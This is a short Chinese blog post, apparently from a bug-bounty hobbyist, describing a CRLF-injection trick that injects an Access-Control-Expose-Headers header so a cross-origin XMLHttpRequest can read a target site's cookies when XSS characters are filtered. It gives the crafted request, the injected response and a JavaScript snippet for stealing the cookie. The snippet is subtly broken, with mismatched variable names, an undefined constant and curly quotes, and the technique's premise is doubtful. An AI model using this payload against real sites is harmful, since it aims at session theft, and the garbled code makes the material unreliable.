zoukankan      html  css  js  c++  java
  • CRLF在过滤XSS语句后打Cookie方式

         看了很长时间的漏洞奖励计划,学到了不少骚姿势,我觉得这个姿势很不错,总结下写篇文章发出来。针对CRLF漏洞打cookie的方法。

         这里不讲概念挖掘方式了,以实战为主:

              阅读文章前先参考文章:http://www.ruanyifeng.com/blog/2016/04/cors.html

              这篇文章对CORS跨域写的的很好,让我的思路清晰了很多,看完这篇文章下面的所谓骚姿势就一点都不骚了哈哈

            利用:

              目标网站:http://xxx.com/

                请求:

                  GET /a?test=b HTTP/1.1

                  Host: xxx.com

     

                响应:

                HTTP/1.1 200 OK

                test=b

      感觉可能存在crlf有戏,直接打cookie试试,这里网站过滤了xss语句,<>都被过滤:

          

              偷cookie:

                GET /a?Access-Control-Expose-Header%0d%0as=Cookie

                Host: xxx.com

              响应:

                HTTP/1.1 200 OK

                Access-Control-Expose-Headers: Cookie

              写段脚本,发起异步请求:

          

          

    var requesta = new XMLHttpRequest();
    var url=”http://xxx.com/a?Access-Control-Expose-Header%0d%0as=Cookie”
    request.onreadystatechange = function () { 
      if(requesta.readyState == getcookie.DONE) {//getcookie.DONE==4
        document.write(requesta.getResponseHeader("Cookie"));
      }
    } requesta.open(
    'GET', url, true); requesta.withCredentials = true; requesta.send();

    发包即可。然后页面会显示cookie。

     

          


            

  • 相关阅读:
    CentOS 下安装apt-get
    Centos 6.5升级到Git2.1.2的步骤
    JAVA常识积累
    Android网络编程概述
    解读ClassLoader
    android ndk调用OpenGL 实现纹理贴图Texture
    android Bind机制(二)
    Android Binder机制原理(史上最强理解,没有之一)(转)
    NDK常见问题
    根因分析初探:一种报警聚类算法在业务系统的落地实施
  • 原文地址:https://www.cnblogs.com/piaomiaohongchen/p/9733277.html
Copyright © 2011-2022 走看看